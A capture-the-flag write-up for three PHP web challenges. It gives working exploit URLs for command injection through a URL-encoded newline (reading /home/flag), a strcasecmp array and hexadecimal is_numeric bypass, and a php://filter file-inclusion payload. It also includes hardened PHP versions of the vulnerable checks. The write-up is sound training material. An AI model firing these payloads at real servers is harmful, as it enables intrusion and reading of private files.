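1. Please ping my IP. Can you get the ping through?
I've filtered everything, so let's see how you get around it. Challenge URL: http://118.190.152.202:8018
Approach: command injection
Testing shows that ?ip=xxx does indeed run ping.
%0a truncation (a URL-encoded newline ends the ping command, so whatever follows runs as a separate command)
Linux commands:
Use ls / to list the root directory
http://118.190.152.202:8018/index.php?ip=127.0.0.1%0Als%20/
The following directories are shown
Use ls -lR /home to look inside each folder
http://118.190.152.202:8018/index.php?ip=127.0.0.1%0Als%20-lR%20/home
Use cat%20/home/flag to read the file
http://118.190.152.202:8018/index.php?ip=127.0.0.1%0Acat%20/home/flag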
2. Please give me username and password!
Challenge URL: http://118.190.152.202:8017/
Crafted URL: http://118.190.152.202:8017/index.php?username=11&password=111
View the source code:
<?php
error_reporting(0);
$flag = "***********";
if(isset($_GET['username'])){
    if (0 == strcasecmp($flag,$_GET['username'])){
        $a = fla;
        echo "very good!Username is right";
    }
    else{
        print 'Username is not right<!--index.php.txt-->';}
}else
    print 'Please give me username or password!';
if (isset($_GET['password'])){
    if (is_numeric($_GET['password'])){
        if (strlen($_GET['password']) < 4){
            if ($_GET['password'] > 999){
                $b = g;
                print '<p>very good!Password is right</p>';
            }else
                print '<p>Password too little</p>';
        }else
            print '<p>Password too long</p>';
    }else
        print '<p>Password is not numeric</p>';
}
if ($a.$b == "flag")
    print $flag;
?>
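1. strcasecmp returns NULL when it is given an array, and NULL == 0, so the condition holds
2. Although password can only go up to 999, and 100 already gives an error, hexadecimal 3E8 can be used to get around this
http://118.190.152.202:8017/index.php?username[]=1&password=3E8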
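A hardened form of the two checks in the source above, as an added example that is not part of the original write-up or the challenge's code. The function names username_ok and password_ok and the sample secret are hypothetical; the point is to reject non-string input before comparing and to accept only decimal digits for the password.

```php
<?php
declare(strict_types=1);

// Added example: hypothetical hardened versions of the two checks above.

// Username: reject anything that is not a string, then compare strictly.
function username_ok($input, string $secret): bool
{
    // username[]=1 arrives as an array; the original handed it to strcasecmp()
    // and compared the result to 0 with the loose == operator.
    if (!is_string($input)) {
        return false;
    }
    // hash_equals() always returns a real bool and compares in constant time.
    // strtolower() keeps the case-insensitive behaviour of strcasecmp().
    return hash_equals(strtolower($secret), strtolower($input));
}

// Password: decimal digits only, then an integer comparison.
function password_ok($input): bool
{
    // is_numeric() accepts "3E8"; a digits-only pattern does not.
    if (!is_string($input) || preg_match('/\A[0-9]+\z/', $input) !== 1) {
        return false;
    }
    // With digits only, "fewer than 4 characters" and "greater than 999"
    // cannot both hold, so the original condition was only reachable
    // through loose typing.
    return strlen($input) < 4 && (int)$input > 999;
}

// Constructed inputs, including the two bypass values from the write-up.
$secret = 'constructed-secret';
foreach ([['1'], 'guess', 'Constructed-Secret'] as $u) {
    printf("username %-22s => %s\n", json_encode($u),
        var_export(username_ok($u, $secret), true));
}
foreach (['3E8', '0x3E8', '1000', '999', ['1']] as $p) {
    printf("password %-22s => %s\n", json_encode($p),
        var_export(password_ok($p), true));
}
```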
3. Can you bypass it?
Challenge URL: http://118.190.152.202:8008/
File inclusion vulnerability:
http://118.190.152.202:8008/index.php?f=Php://filter/read=convert.base64-encode/resource=index&id=4
Base64-decode the output